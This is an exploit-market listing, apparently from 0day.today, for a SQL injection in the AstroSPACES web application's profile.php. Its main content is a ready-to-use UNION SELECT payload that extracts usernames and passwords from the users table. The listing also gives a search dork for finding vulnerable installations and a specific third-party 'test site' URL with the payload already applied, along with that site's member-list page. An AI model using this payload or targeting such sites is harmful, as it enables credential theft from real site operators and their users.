[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AstroSPACES (id) Remote SQL Injection Vulnerability

Author
TurkishWarriorr
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3896
Category
web applications
Date add
14-10-2008
Platform
unsorted
===================================================
AstroSPACES (id) Remote SQL Injection Vulnerability
===================================================


# AstroSPACES (profile.php) SQL

  Powered by Philippine Website Developers and AstroSPACES © P3NET 2006-2007
#########################################################################
#
# AUTHOR : TurkishWarriorr  (Sehitler Olmez Vatan Bolunmez ....)
#
#########################################################################
#
# DORK : Powered By AstroSPACES
#
##########################################################################
EXPLOIT :

profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--


test sites:

http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--


E mail login :

http://quirino.com.ph/friendster/space.php?action=memberlist

##########################################################################



#  0day.today [2024-12-25]  #